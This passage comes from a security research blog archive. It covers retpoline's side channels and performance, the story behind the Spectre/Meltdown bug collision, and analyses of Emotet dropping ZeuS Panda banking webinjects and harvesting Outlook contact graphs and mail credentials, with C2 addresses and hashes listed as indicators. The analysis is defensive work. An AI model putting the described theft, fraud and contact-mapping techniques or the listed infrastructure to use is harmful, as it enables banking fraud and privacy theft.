Retpoline’s architectural side channels consist of flushing an entry in the RSB caused by the call in line (1). This information is unlikely to bring an attacker much advantage and would require the attacker to have a sufficient amount of control over the RSB. The 6th line makes a store access on the stack. This is visible through a cache side channel to an attacker, provided the attacker has sufficient control. However, it is unlikely to provide much information given that the stack is usually used by the functions themselves. It is worth noting that any information this side channel can provide is also provided by the jmp rax (6). Presumably retpoline’s stack access provides slightly less information to an attacker than the original jmp rax instruction – i.e. BTB indexing bits vs. cache set indexing bits.
The 7th line is more tricky: if the CPU updates the BTB after a misprediction, the BTB side channel will be similarly useful to that of the original jmp rax. I think it is likely that the BTB is not updated until retirement, so that this side channel isn’t present. Since the pause instruction (line 3) is a CPU hint, the CPU may choose to take or ignore the hint at its discretion – more on this below. Thus, pause may or may not provide a side channel. If external power is plugged in and the hint is taken, one can see a co-located hyperthread speed up, which is the purpose of having the pause instruction here, but certainly a side channel as well. If the CPU is running in power saving mode (e.g. unplugged laptop), pausing provides a side channel since executing a pause instruction on two co-located hardware threads causes a delay for both, presumably through C-State interaction. In sum, I think the side channels provided by retpoline are less valuable than the side channel provided by the original indirect branch (but they are still present).

PERFORMANCE ANALYSIS OF RETPOLINE

A jmp rax instruction takes about 4 clock cycles to execute and predicts correctly very often. It is replaced in retpoline with a ret instruction which will always mispredict and thus executes far slower. However, unlike with hard serialization, once the ret instruction has been executed out-of-order, the CPU seems to be able to continue without a pipeline flush, thus allowing out-of-order execution to continue. This creates two corner cases: firstly, where dependencies block out-of-order execution across the indirect branch, and secondly, where there is no dependence across the indirect branch. I managed to create a sequence of instructions where retpoline was just as fast as the original unpredicted branch – this is the case when the instructions after the branch depend on the results of the instructions before the branch.
Obviously, any co-located hyperthread will be more affected by the retpoline than by a predicted indirect branch, but the thread itself does not lose any cycles. At first this seems weird, but imagine completely dependent ALU integer instructions on both sides of the indirect branch – with the branch unit being completely free, both retpoline and the indirect branch will execute concurrently with the integer ALU instructions before the branch. Since the integer ALU instructions after the branch depend on those before the branch, they only get scheduled for execution once all prior instructions have been executed. Thus, retpoline and an indirect branch perform equally.

In the case of no dependencies across the indirect branch, retpoline is slower. Retpoline will not allow the out-of-order execution to continue until the ret instruction is executed and consequently adds a penalty compared to a predicted indirect branch. In general, the longer it takes for the indirect branch to resolve, the higher the penalty of retpoline is.

There is also an indirect performance cost of retpoline which – in my opinion – is likely to be somewhat smaller. The call in line 1 will push a return address onto the RSB (and consequently may evict the oldest entry in the RSB), thus potentially causing an RSB underflow once a previous call returns. An RSB underflow will manifest itself as a negative performance impact if the evicted RSB entry causes mispredictions or stalls in unrelated code later on. For this to happen, the call stack is required to be deeper than the size of the RSB. The stall penalty of the underflow was big enough to cause Intel to add prediction to the microarchitecture (for Broadwell and Skylake). If this prediction was as efficient as using the RSB, the RSB would not exist. The following table presents the results of my micro benchmarking:

| Unit: clock cycles | Mean | Std.dev | Median |
| --- | --- | --- | --- |
| jmp rsi | 350.33 | 95.48 | 346 |
| retpoline pause | 410.64 | 65.94 | 410 |
| retpoline lfence | 403.76 | 25.96 | 404 |
| retpoline clean | 402.13 | 19.99 | 402 |
| retpoline pause lfence | 406.74 | 64.76 | 404 |
| retpoline ud2 | 404.29 | 28.70 | 402 |

The “retpoline clean” is without the pause instruction, “retpoline lfence” is where pause has been replaced with an lfence instruction. The results are generally not very stable over multiple runs, but all three versions of retpoline often end up with an average of around 400-410 cycles, with the indirect branch being around 50 clks faster on average. Thus, some additional care should be taken before concluding that “retpoline pause” is slower than the others. I ran the tests with 100k observations and removed the slowest 10% of observations in a primitive noise reduction approach. The microbenchmark is for a bad case with no dependency across the indirect branch for integer instructions (add rsi,1, add rbx, 1 respectively) and is run on an Intel i7-6700k. While microbenchmarking is important for the arguments I will put forth in this text, it is important to note that the results are not reflective of the system’s performance, as the incidence of indirect branches is relatively small and this benchmark is manufactured to portray cases which are worse than normal scenarios. Also, the microbenchmarking completely ignores any indirect effects.
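The noise reduction step described above can be sketched in Python as follows. This is not the benchmark harness itself, only an illustration of the post-processing: the function name `summarize` and the choice of the population standard deviation are assumptions, since the text does not say which estimator was used.

```python
import statistics


def summarize(cycles, drop_fraction=0.10):
    """Drop the slowest `drop_fraction` of samples, then summarize the rest."""
    if not cycles:
        raise ValueError("need at least one observation")
    # Number of samples that survive the cut (the slowest ones are discarded).
    keep = len(cycles) - int(len(cycles) * drop_fraction)
    kept = sorted(cycles)[:keep]
    return {
        "n": len(kept),
        "mean": statistics.fmean(kept),
        # Assumption: population standard deviation of the kept samples.
        "stdev": statistics.pstdev(kept),
        "median": statistics.median(kept),
    }


if __name__ == "__main__":
    # Made-up cycle counts with one obvious outlier (e.g. an interrupt).
    samples = [400, 402, 401, 399, 405, 398, 403, 400, 404, 10000]
    print(summarize(samples))
```

Trimming only the slow end is deliberately one-sided: interrupts and similar disturbances can only make a measurement slower, never faster.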

THE WEIRD CASE OF PAUSE

It immediately seemed weird to me to have the pause instruction in the spinlock in line 3 of retpoline. Usually we have pause instructions in spinlocks, but spinlocks execute architecturally at some point. Having a pause of 10 clock cycles for Broadwell and 100 for Skylake in the spinlock potentially causes the CPU to pause the architectural flow that needs to be done before the return instruction can be executed. This may lead to a larger-than-necessary penalty for the spinlock. However, pause is not actually an instruction. It is a hint to the CPU and my guess is that the hint is not taken. I ran retpoline on my Broadwell and my Skylake and compared the penalty: there was almost no difference. This is important because we would expect the different implementations of pause to give different average latencies if it was actually executed (10 clk vs 100 clk).

Another argument for pause not being executed speculatively is that pausing is connected to a VmExit. I can only guess why Intel made it possible to get a VmExit on a pause instruction. I think the most compelling reason would be to use the pause of a spinlock in a guest to process small work items in the hypervisor instead of just idling the CPU. This would probably also help virtualizing hardware. If I am right about this, it would be sensible for the pause hint to actually pause only on retirement instead of pausing the CPU speculatively.

Another argument is power management: the behavior of the pause instruction depends on the C-State of a co-located hyperthread. Presumably this gives us one of the two side channels described in a previous section. There is little reason for a CPU designer to pause a thread which is executing other instructions out-of-order.

DISCUSSION OF TECHNICAL DEBT OF RETPOLINE

As clever as retpoline seems, I think it is fundamentally broken. Not because it does not work, but because it builds up a large amount of technical debt.
Adding retpoline to a piece of software would require CPU designers to make sure that legacy software is compatible with new CPUs. If a company like Google applies retpoline in their infrastructure, it is fairly unproblematic: Google has a nice inventory of the software running on their systems and they can make sure that software deployed to new CPUs is recompiled, so this poses no constraints on a CPU designer. However, if we add retpoline to a compiler, we can be sure it will be added to all kinds of software including virtual machines, containers, specialized software etc. These pieces of software often do not remain supported and are poorly catalogued. Consequently, if the behavior of retpoline changes significantly, these systems may perform suboptimally, be unsafe or even completely break. This effectively ties the hands of CPU designers as they strive to improve the CPU in the future.

The first concrete problem I see is the use of the pause hint: regardless of whether the pause hint is taken in retpoline or not, its non-intended use in retpoline ties down the behavior of this instruction for CPU designers in future generations of CPUs. It is worth noting here that we have at least 3 different implementations of the pause hint in different CPUs already (treated as nop, stall 10 clks, stall 100 clks). Adding to that the complexity of the instruction I outlined above, it would be fair to assume that this instruction might need changes in future generations of CPUs. Thus, having the pause hint in retpoline scattered over software everywhere might turn out to be a bad idea in the long term. The good news here is that there probably is a good solution for this.
Replacing the pause instruction with lfence will serialize the speculative path and probably even stop it from looping. Effectively stopping the execution of the spinlock may free up resources for a co-located hyperthread as well as branch execution units for the main thread that would otherwise have been tied up by the jmp instruction in line 4. I ran some tests on Skylake and found very nearly identical performance results for pause and lfence, suggesting that this is a viable solution. It is important to note that the lfence instruction was previously documented to only serialize loads. Instead, it silently serialized all instructions, which is now the documented behavior since Intel published their errata documents for the Spectre/Meltdown patches. So, the mortgage on lfence is small and has already been signed.

The second concrete problem I see, the construct which retpoline uses to direct speculative execution into the spinlock, is a much bigger problem. On Skylake, return instructions predict by using the indirect branch predictor, requiring Skylake to be handled differently than other CPUs. The problem is twofold: on the one hand, the very common ret instruction needs to be replaced with retpoline (or other non-speculative branching), and on the other hand, the hardware interrupt raised in line 6 may underflow the RSB in the interrupt handler. Thus, retpoline is already potentially unsafe on some CPUs (in my opinion much less so than without retpoline, though). The technical debt here is that retpoline may be completely unsafe if future CPUs stop relying on the RSB for return prediction. There may be many reasons for a CPU designer to change this, for example a completely unified system for indirect branches or prediction of monotonic returns (returns with only one return address). The latter will keep the RSB safe from non-monotonic returns if the RSB underflows and thus may perform better when there are deep call stacks.
I do not know whether these things are good ideas, but retpoline might effectively rule them out. Also, one could imagine conflicts with future CPU-based control-flow integrity systems, etc. One could argue that performance optimizations rely on microarchitecture details all the time, but there is an important difference between breaking a performance optimization and breaking a security patch. Already we see problems with updating broken libraries amongst software vendors; it’s not difficult to imagine what would happen if secure software becomes insecure because of CPU evolution. Instead of taking on technical debt potentially forever, I suggest we use either a less secure option (i.e. lfence ahead of indirect branches) or a more expensive option such as IBPB or replacing indirect calls with iret (which is documented to be serializing). That constitutes a high price now, but avoids paying rent on technical debts in perpetuity.

CONCLUSION

Retpoline is an effective mitigation for Spectre variants which rely on causing misprediction on indirect branches on some CPUs. From a pure side channel perspective, retpoline adds a different side channel, but it is an improvement over the side channel of a traditional indirect branch nonetheless. Retpoline’s performance penalty is complex, but likely smaller than the penalty of the serializing alternatives. However, as retpoline relies on assumptions about the underlying microarchitecture, it adds technical debt if used widely. If Google, Microsoft or whoever else has software-deployment management wants to use it, they have my blessing, but there are reasons for scepticism about whether it is a good idea to have it in general purpose compilers. CPU vendors’ short term marketing deficits should not lead us to trade small short term performance gains for technical debt that has to be paid back with interest in the future through a more complex microarchitecture.

APPENDIX ADDED 14TH OF FEBRUARY 2018

Stephen Checkoway of the University of Illinois at Chicago commented that it might be worth testing a ud2 instruction in the speculatively executed spinlock. I find this idea promising because ud2 essentially just throws an “invalid opcode” exception, and thus abusing it for retpoline is likely to produce performance equivalent to that of lfence, perhaps even better. Further, it’s unlikely that using this instruction is associated with any technical debt. The simple test result here shows that the direct performance impact is approximately similar to that of the other versions of the spinlock (see table above). Some implemented versions of retpoline use a pause followed by an lfence instruction. I added this to the performance table as well. Thanks to Khun Selom & @ed_maste (twitter account).

LITERATURE

Turner, Paul. “Retpoline”. https://support.google.com/faqs/answer/7625886

Fogh, Anders. “Two covert channels”. https://cyber.wtf/2016/08/01/two-covert-channels/

Fogh, Anders. “Covert Shotgun”. https://cyber.wtf/2016/09/27/covert-shotgun/

Intel. “Intel® 64 and IA-32 Architectures Software Developer Manual: Vol 3”. https://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-system-programming-manual-325384.html

Intel. “Intel® 64 and IA-32 Architectures Optimization Reference Manual”. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.

Intel. “Speculative Execution and Indirect Branch Prediction Side Channel Analysis Method”. https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr

Author Anders Fogh Posted on February 13, 2018, updated February 14, 2018


BEHIND THE SCENES OF A BUG COLLISION

Introduction

In this blog post I’ll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPUs concurrently. The conclusion is that the bug was ripe because of a years-long build-up of knowledge about CPU security, carried out by many research groups. I’ll also detail the rough story behind the research that led me to the bug. My story is probably different from that of the other researchers, but while it is unique, I am relatively sure that one thing is the same for all researchers on most security issues: security research is a long-haul thing. The remainder of this blog post is semi-technical.

WHY DID WE GET A BUG COLLISION ON SPECTRE/MELTDOWN?

This is of course my take on the event, my personal story, which I’ll detail below. Research collision in CPU research isn’t that uncommon. In fact, the story of my friendship with Daniel Gruss is about a series of collisions. In 2015 I was preparing a talk about row hammer for Black Hat with Nishat Herath when Daniel tweeted that he was able to flip bits from JavaScript. I didn’t want to have questions I couldn’t answer, so I started researching it and literally the evening before Daniel published how he was doing it, I knew how he did it. Later Daniel teased me about detecting cache side channels if there were no L3 cache misses. I replied ‘are you timing Clflush?’ He was indeed. You’ll find me acknowledged in the paper for this reason. I told him he shouldn’t worry about me competing on publishing it, because I was doing research on a side channel in the row buffer and didn’t have time to compete on Clflush. Turns out he and the WU cache clan were too. I blogged it, and the WU cache clan wrote a paper on it in Pessl et al. You’ll find me acknowledged there as well. Not long after that, I did a blog post on breaking KASLR with the prefetch instruction. Obviously, Daniel was doing the exact same thing again.
We had enough of competition and started what is by now a regular collaboration with the WU cache clan after that point.

So why do things like this happen? (Granted, the story about Daniel is a freaky one.) Well, CPU research is much like drawing a map of an uncharted world. Researchers start from known research and proceed into the unknown, and if they find something, they document it and add it to the map. This essentially means that the frontier looks very similar to everybody, leading people onto the same paths. This process is very much sustained by the fact that almost all research in this area is academic, and academia is much better organized in terms of recording and documenting than hackers are.

For a thing like Meltdown, the real foundation was laid with the work on cache side channels sometime back around 2005. There are many papers from this time; I’ll mention Percival because it’s my favorite. Another milestone paper was Yuval Yarom’s paper on Flush+Reload. Note that Yuval is also a co-author of the Spectre paper. With this foundation, a subgenre of papers emerged in 2013 with Hund, Willems & Holz. They essentially noticed that when an unprivileged user tries to read kernel mode memory, the CPU actually does a great part of the read process before raising an error, allowing a user to observe not the data of the kernel, but the layout of the kernel – this is known as a KASLR break and is important for classical exploits. This work was followed up with improvements including Gruss et al. and Yang et al. Both papers showed that a lot more work was being done by the CPU than was strictly needed when an unprivileged user accesses kernel memory – an important prerequisite for Meltdown to exist. Also in 2016, another KASLR break using branches emerged from Evtyushkin et al. They didn’t try to read from the kernel but rather found that branch prediction leaked information.
This is important because branch prediction is a precursor for speculative execution and thus builds a bridge towards Meltdown. Felix Wilhelm extended Evtyushkin et al. to hypervisors, which is likely to be important in the rationale for hypervisors being affected. In fact, I think Jann Horn mentioned this blog post as an inspiration. There were other works, like that of Enrique Nissim, which showed that the KASLR breaks have real-world applications with a classic exploit. Also in 2016, some work was being done on side channels in the pipeline. My Covert Shotgun blog post is an example of this literature.

To sum it up, by the end of 2016 it was known that unprivileged reads from user mode to kernel mode did more processing than was strictly required, it was known that branches were important, and there was work going on examining the pipeline. In effect, the Meltdown bug was surrounded on all sides. It was a single blind spot on the map – obviously, nobody knew that there’d actually be a bug in this blind spot and I think most did not believe such a bug existed. Other people would probably pick other papers, and there were many. My point remains: a lot of people moved towards this find over a very long period of time.

THE PERSONAL PERSPECTIVE

I work for GDATA Advanced Analytics, and there I work in an environment that is very friendly and supportive of research. Without research, a consulting company like ours cannot provide excellence for its customers. However, CPU bugs don’t pay the bills, so my day job does not have much to do with this. I spend my time helping customers with their security problems: malware analysis, digital forensics, and incident response are the main tasks that I do on a day-to-day basis. This means that the bulk of the work I do on CPUs is done in my spare time after hours. So my story with Meltdown and Spectre starts essentially at Black Hat 2016, where Daniel Gruss and I presented our work on the prefetch instruction.
The video of our talk can be found here. As described above, this work slowly gave me this fuzzy feeling that maybe this work is just the tip of the iceberg. In fact, I did a blog post about the meta of breaking KASLR in October 2016 and presented it at RuhrSec 2017, so I was very well acquainted with that literature. Meanwhile, I wanted to get away from working with caches and accidentally found some covert channels and wrote about them. I thought there might be more and started picking apart the pipeline in search of covert channels. My frustration led me to automate finding covert channels, which resulted in this blog post and later this talk at HackPra. In the talk, you can hear that I’m still frustrated: “I don’t care, I’ll just use a shotgun”. To this day I have many unanswered questions about the pipeline.

Later that year I met up with the WU Cache Clan at CCS, where we were presenting the academic version of the prefetch KASLR break. We had some beer-fueled conversations. The conversations were continued at Black Hat Europe (Michael Schwarz and I did a talk on the row buffer side channel we’d done concurrent work on), where I started believing that Meltdown might be possible, but still without a clue as to how it could possibly work. I finally made the connection to speculative execution in December 2016/January 2017 when I prepared the presentation for HackPra about Covert Shotgun. There are a lot of slides about speculative execution. At first, I didn’t think about reading kernel memory. My first “attack” was just another attack on KASLR. Essentially it was Hund, Willems, Holz in a speculative version. The work never really got finished (timing inside of speculative execution is possible, but not easy – I did not find a solution to this problem until much later). The rationale for doing this work was that it would solve a problem with their method, and since I do this stuff in my spare time, fun is essential and this sounded like fun. So my project name for Meltdown was “undead KASLR”, despite me quickly figuring out there were bigger fish to be fried.

I told my friend Halvar Flake about the weird ideas while presenting at IT-Defense in February, and his encouragement was a big part of me actually continuing, because I didn’t believe it would work. In March, I had the first chance to do some real work on the project during a small getaway from work to present Jacob Torrey’s and my work on PUFs (the work was really mostly Jacob’s – and not related to Meltdown per se) at Troopers 17. I researched in the mornings in the hotel and even did some research during other people’s talks. Fun fact: there is a video of me doing a Spectre-style attack POC on the code I’d added to Alex Ionescu’s wonderful Simplevisor. Hi Alex!
I’m the bald head seen to the lower left of the center aisle doing weird head movements and packing away my laptop as I succeeded at around 19 minutes into the video. The second half of the talk was pretty awesome btw!!

Later in March 2017, I visited Daniel, Michael, and Clementine Maurice in Graz to work on a common project we had on detecting double fetch bugs with a cache attack (which became this paper). Here I tried to pitch my idea, because with the workload I had I knew it would be difficult for me to realize alone. Unfortunately, I wasn’t the only one fully booked out, and Daniel, Michael and I were super skeptical at that time, despite the slight encouragement I’d had at Troopers. So we decided to finish the stuff we were already doing first. Might I add here that Daniel and Michael did some really cool stuff since then? With me struggling with work and with making a sufficient contribution to the double fetch paper, the project was on ice. The main reason why my name is so far back on the paper is that I didn’t have time to pull my weight.

After Troopers, I didn’t get much done and was really frustrated about it. So in July, I started back up again in the evenings. It helped me immensely that my climbing partner suffered an injury, giving me a bit more time. This time around I was working targeted at Meltdown. I was doing stuff much too complicated at first and wasted a lot of time on that. Then I tried to simplify things as much as I could, and this is why I ended up with a negative result. I wrote up the blog on company time on a Friday before noon before leaving early on a vacation. Luca Ebach helped proofread it. If he hadn’t, it would’ve been unreadable and Tomasulo would’ve been spelled wrong. The “Pandora’s box” part of the blog post is a reference to the limited and unfinished stuff I did on “Spectre”, which I was sure would work at the time, but needed checking before I’d commit to blogging about it. While on vacation, I decided to wrap things up in an academic paper and, with some positive results in my hands, seek help from some academic professionals. So I continued my research afterward; after all, you don’t open Pandora’s box without looking at what is inside.

In light of recent events, I shall not be publishing the rest of the stuff I did. The stuff that Jann Horn did is really, really awesome; the same goes for the Spectre/Meltdown papers. It is wonderful to see that I was barking up the right tree. It is important to me to mention that Jann Horn reported his research prior to my blog post and did not have access to mine prior to that date.

LITERATURE

[1] Gruss, Daniel, et al. “Flush+Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.
[2] Nishat Herath, Anders Fogh. “These Are Not Your Grand Daddy’s CPU Performance Counters” Black Hat 2015, https://www.youtube.com/watch?v=dfIoKgw65I0
[3] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.
[4] Percival, Colin. “Cache missing for fun and profit.” (2005).
[5] Yarom, Yuval, and Katrina Falkner. “FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX Security Symposium. 2014.
[6] Hund, Ralf, Carsten Willems, and Thorsten Holz. “Practical timing side-channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013.
[7] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[8] Jang, Yeongjin, Sangho Lee, and Taesoo Kim. “Breaking kernel address space layout randomization with intel tsx.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[9] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.
[10] Wilhelm, Felix. “Mario Baslr”, https://github.com/felixwilhelm/mario_baslr
[11] Nissim, Enrique. “I Know Where Your Page Lives: De-randomizing the Windows 10 Kernel”. https://www.youtube.com/watch?v=WbAv2q9znok
[12] Fogh, Anders. “Covert Shotgun”, https://cyber.wtf/2016/09/27/covert-shotgun/
[13] Fogh, Anders, Gruss, Daniel. “Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process” Black Hat 2016.
[14] Fogh, Anders. “Micro architecture attacks on KASLR”, https://cyber.wtf/?s=kaslr
[15] Fogh, Anders. “Micro architecture attacks on KASLR and More”, https://www.youtube.com/watch?v=LyiB1jlUdN8
[16] Fogh, Anders. “Two covert channels”, https://cyber.wtf/2016/08/01/two-covert-channels/
[17] Fogh, Anders. “Covert Shotgun”, https://www.youtube.com/watch?v=oVmPQCT5VkY&t=34s, HackPra 2017
[18] Schwarz, Michael, Fogh, Anders. “Drama: how your DRAM becomes a security problem”. Black Hat Europe 2016 https://www.youtube.com/watch?v=lSU6YzjIIiQ
[19] Ionescu, Alex. “SimpleVisor” https://github.com/ionescu007/
[20] Neilson, Graeme. “Vox Ex Machina”, Troopers 17. https://www.youtube.com/watch?v=Xrlp_uNBlSs&t=1145s
[21] Schwarz, Michael, et al. “Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features.” arXiv preprint arXiv:1711.01254 (2017).
[22] Fogh, Anders. “Negative result: reading kernel memory from user mode” https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

Author Anders Fogh. Posted on January 5, 2018 (updated January 8, 2018)

BANKING USERS

Emotet is currently one of the prevalent threats on the Internet. The former banking trojan is now known to steal passwords and to drop other malware like Dridex on its infected machines. We recently found Emotet spreading Zeus Panda, which presented us with an opportunity to link some of our research on Emotet with our analysis of ZeuS Panda. The Zeus Panda sample used in this wave is rolled out through Emotet in German-speaking countries and targets online banking users in Germany and Austria.

The Emotet C2 server drops additional malware to infected systems. Whether a system receives such a package seems to be based on the geographical location of the infected system in question. After the additional malware is downloaded from the C2 server, it is written to a file in %ALLUSERSPROFILE% (C:\ProgramData in recent Windows versions) with a random name of 4 to 19 characters in length and the file extension “.exe”. Emotet is capable of executing this binary in two different ways; the C2 server chooses which one is used. The first mode executes the malware in the same context that Emotet is running in, the second mode executes the malware in the context of the currently logged-on user.

As stated above, the current wave downloads and executes the well-known ZeuS Panda banking trojan. To know which banking sites it should attack and how to modify the site’s content, the trojan needs so-called webinjects. From the URL masks of the webinjects this sample uses, we can tell that it currently targets online banking customers in Germany and Austria. All injects write a single script reference into the targeted websites. When the targeted site is loaded, the browser loads the referenced script, which is then executed in the context of the banking website. The only difference between the webinjects is the last number in the URL of the script source. This number seems to define the targeted website, which allows the server to deliver a target-specific script. The script actually downloaded is obfuscated by a simple string encryption. The actual script is part of an Automated Transfer System (ATS) which tries to persuade the user into transferring money to an account the attacker specifies.

The above screenshots show an exemplary representation of the modification of the banking websites. They show two different attack scenarios: The first script tries to trick the user into performing a transaction in the guise of a security check. The attackers “inform” the customer of newly installed security measures on the banking website, coercing the user to complete a training using a demo account before they are able to access their account again. During this training, a real transaction is made in the background to an account that the attacker specifies. The phrasing in the text is lousy and should raise suspicion with most customers.

The second script tries to persuade the user that an erroneous transfer was made to their account. It suggests going to a bank branch or making the return transfer online. Additionally, the script blocks access to the banking account until the return transfer has been completed. The phrasing in the text is better than in the first script and may not raise suspicion at first glance.

The first script matches word for word the webinject Kaspersky identified during their analysis of Emotet in 2015. At that time Emotet contained its own banking trojan capability and delivered the webinjects directly into the browser. As ZeuS Panda uses the same webinject format as the old Emotet, we can speculate about the reasons:

* The webinject is acquired from the same creator
* The group behind Emotet has dropped developing their own banking trojan and acquires such trojans from other malware authors
* The group behind Emotet developed multiple banking trojans for its own use and for sale

It seems Emotet is not only used to sell distribution of malware, but also used by its owners. It is also possible that the group behind Emotet uses the slim downloader as an entry point for targeted attacks. In this case the group can spread Emotet worldwide and distribute specific malware to each target. As the real malicious payload is only downloaded after some time and only to specific targets, analysts cannot directly draw conclusions about the real intention of an infection.

IOCS

EMOTET:

C2:

5.9.195.154

45.73.17.164

60.32.214.242

85.25.33.71

194.88.246.242

213.192.1.170

217.13.106.16

217.13.106.246

217.13.106.249

SHA256:

0d25cde8d49e1bcf6a967c0df6ac76992ff129ea5c30a1492a5bedd313e6fb51

c287a9aa25ed6afc54bc5ebe4b098675f3fa4b7cb51fbdcfb50591b4b8fa3b90

ZEUS PANDA:

C2:

uamanshe.gdn

ugjeptpyour.top

SHA256:

4fe20a9cf5e5c28ec55aa529179f7fe6df3cda8ae43340b04b2402f43dfefd5f

fbd9e31cc5cbfce2b8135234fdcfdac7fa48a127aa6f3644d05c6ba77bd6d903

Author Anton Wendel. Posted on November 27, 2017

Categories: analysis
Tags: banking, Emotet, malware, security research, trojan, webinject, zeus, zeus panda

EMOTET HARVESTS MICROSOFT OUTLOOK

The original German blog post can be found on the G DATA Blog.

Emotet has been known as a trojan for years. Former versions focused on attacking online banking users; however, the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska in April 2017. Since then, Emotet has been spreading through spam phishing mails containing a link to a Microsoft Word document that acts as a dropper for the Emotet binary. Recently, CERT-Bund again warned about the spam mails which spread Emotet. The sender address of these emails is spoofed to appear as a sender known to the recipient. This strengthens the trust in the mail and increases the probability that the recipient opens the attachment or link without further consideration.

For this to work, the entities spreading Emotet need to have at least superficial knowledge of the social network a target interacts with via email. Acting opportunistically, Emotet delivers a specific module to infected systems to harvest all emails in Microsoft Outlook accounts of the current user, allowing it to extract the relations between sender and receiver. To obtain the information from Outlook, the module takes advantage of the standardized interface MAPI.

The picture above shows the loading of the MAPI DLL and the retrieval of the needed functions. Utilizing this interface, the module iterates through all Outlook profiles it can access on the computer. It extracts all email account names and email addresses from each profile. Afterwards it searches for emails recursively in each folder in the profile. From each mail found it extracts the sender (displayed name and mail address) and all recipients (displayed names and mail addresses), including the recipients in the CC and BCC fields, and saves them in relation to each other. The picture below shows the extracted fields from the emails. In case a field only contains a reference to an address book entry, the module extracts the name and email address from the address book. In this process only the mail header is evaluated; the content of the mails is not analyzed.

After the Emotet module has searched all profiles, folders, and emails, it writes the data it has retrieved to a temporary file in the directory %PROGRAMDATA%. The email addresses are sorted in descending order by how often they occur. Each address is extended with all contacts that are in relation to it. However, two cases are distinguished:

* if the referenced contact is the sender of the mail, it is extended with all recipients
* if the referenced contact is the recipient of the mail, it is only extended with the sender

Example (Mailbox of A):

Mail 1: A sends to B and C
Mail 2: D sends to A
Mail 3: C sends to A, D, and E

A is referenced three times and therefore is placed on top of the list. A has a relation to B and C through mail 1, thus B and C get connected with A. Mail 2 shows a connection from D to A, thus D gets connected with A too. The relation from C to A in mail 3 is ignored, because it is already captured in mail 1 (A→C). Mail 3 contains the additional relations C→D and C→E. As no relations between C↔D and C↔E are in the list yet, the contacts D and E get assigned to the contact C and are appended to the list. The complete list, which gets transferred to the attacker, looks like this:

A; B; C; D
C; D; E

Afterwards the module encrypts the file, transfers it to the attacker and removes it from disk. This allows the attacker to get a condensed but comprehensive overview of the social network graph behind a victim’s email communications. With such a list, an attacker has knowledge of the relations between persons and can send spam mails with a suitable sender header without great effort. Additionally, an attacker learns relations between contacts whose computers are not yet infected.

To deliver the spam mails to the suitable recipients, the attacker needs valid email accounts. For this task, they use an additional module that is able to extract the credentials from mail programs and transfer them to the attackers. To extract the credentials from all common mail programs, such as Microsoft Outlook, Mozilla Thunderbird, and Windows Mail, this module utilizes an integrated copy of the application _Mail PassView_ from the company NirSoft. It writes this information to a temporary file, which is then encrypted and transferred to the attacker. Once transferred, the temporary file is deleted.

Author Anton Wendel. Posted on October 12, 2017 (updated November 24, 2017)

Categories: analysis
Tags: Emotet, security research, trojan
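For analysts who want to reproduce the relation list from the worked example in the Emotet post above (mailbox of A), the following is a minimal sketch in Python. It is a reconstruction from the prose description only, not the module's actual code: the function name `build_relation_list`, the `(sender, recipients)` tuple format, and the tie-breaking rule (addresses with the same count keep their order of first appearance) are assumptions made for illustration.

```python
from collections import Counter


def build_relation_list(mails):
    """Build 'address; contact; contact' lines from (sender, recipients) tuples.

    Assumption: addresses with equal occurrence counts keep the order in
    which they were first seen (the post does not specify tie-breaking).
    """
    counts = Counter()
    for sender, recipients in mails:
        counts[sender] += 1
        for recipient in recipients:
            counts[recipient] += 1

    # sorted() is stable, so ties keep first-seen order (dict insertion order).
    order = sorted(counts, key=lambda addr: -counts[addr])

    seen_pairs = set()  # undirected relations already written to the list
    lines = []
    for addr in order:
        contacts = []
        for sender, recipients in mails:
            if sender == addr:
                candidates = recipients      # sender: extend with all recipients
            elif addr in recipients:
                candidates = [sender]        # recipient: extend with sender only
            else:
                continue
            for other in candidates:
                pair = frozenset((addr, other))
                if other != addr and pair not in seen_pairs:
                    seen_pairs.add(pair)
                    contacts.append(other)
        if contacts:
            lines.append("; ".join([addr] + contacts))
    return lines


example = [
    ("A", ["B", "C"]),       # Mail 1
    ("D", ["A"]),            # Mail 2
    ("C", ["A", "D", "E"]),  # Mail 3
]
for line in build_relation_list(example):
    print(line)
# A; B; C; D
# C; D; E
```

Storing each relation as an unordered pair is what makes the C→A relation in mail 3 collapse into the A→C relation already captured from mail 1.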

DGA CLASSIFICATION AND DETECTION FOR AUTOMATED MALWARE ANALYSIS

INTRODUCTION

